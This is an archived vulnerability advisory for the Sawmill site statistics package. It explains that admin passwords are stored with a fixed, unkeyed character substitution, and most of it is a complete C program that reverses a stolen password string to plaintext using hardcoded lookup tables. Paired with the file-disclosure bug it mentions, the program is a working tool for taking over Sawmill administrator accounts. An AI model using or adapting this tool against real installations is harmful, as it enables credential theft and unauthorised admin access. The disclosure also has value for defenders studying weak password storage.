// source: https://www.securityfocus.com/bid/1403/info
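Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. Combined with the file disclosure vulnerability in Sawmill (bid = 1402), this could allow an attacker to read the contents of Sawmill's password file, then decrypt the password and gain Sawmill administrative capabilities. As the lookup tables in the code below show, the "hash" is a fixed one-to-one character substitution with no key or salt, so any stored value that is disclosed can be reversed directly.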
/*Decrypt password for Sawmill admin account.

Larry W. Cashdollar
lwc@vapid.betteros.org
http://vapid.betteros.org
usage ./decrypt cyphertext

*/
#include <stdio.h>
#include <string.h>
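/*
 * Index-aligned substitution tables: encode[i] is the stored form of the
 * plaintext character alpha[i].  The mapping is fixed and unkeyed, which is
 * why a disclosed password file is equivalent to disclosed passwords.
 *
 * alpha holds no uppercase letters and no space, and it is one character
 * longer than encode, so its final '|' has no stored counterpart here.
 *
 * Both tables point at string literals, so they are declared const:
 * writing through them would be undefined behavior.
 */
const char *alpha = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
const char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";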
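/*
 * Map each character of the stored Sawmill password (argv[1]) back through
 * the encode -> alpha substitution tables and print the result.
 *
 * Characters that do not appear in encode are skipped without any output,
 * so the printed text can be shorter than the input.
 *
 * Returns 0 on success, 1 when no ciphertext argument was supplied.
 */
int
main (int argc, char **argv)
{
  char cypher[128];
  size_t encode_len;
  size_t x, y;

  /* Without this check a missing argument dereferences a null argv[1].  */
  if (argc < 2 || argv[1] == NULL)
    {
      fprintf (stderr, "usage: %s cyphertext\n",
               (argc > 0 && argv[0] != NULL) ? argv[0] : "./decrypt");
      return 1;
    }

  /* Bounded copy that always NUL-terminates; strncpy left the buffer
     unterminated for inputs of 128 characters or more, so the scan below
     could run past the end of cypher.  */
  snprintf (cypher, sizeof cypher, "%s", argv[1]);

  /* The table length is loop-invariant; compute it once.  */
  encode_len = strlen (encode);

  for (x = 0; cypher[x] != '\0'; x++)
    {
      /* y stays below the length of encode; alpha is at least as long,
         so alpha[y] is always in bounds.  */
      for (y = 0; y < encode_len; y++)
        {
          if (cypher[x] == encode[y])
            putchar (alpha[y]);
        }
    }

  printf ("\n\"+\" could also be a space [ ]\n");
  return 0;
}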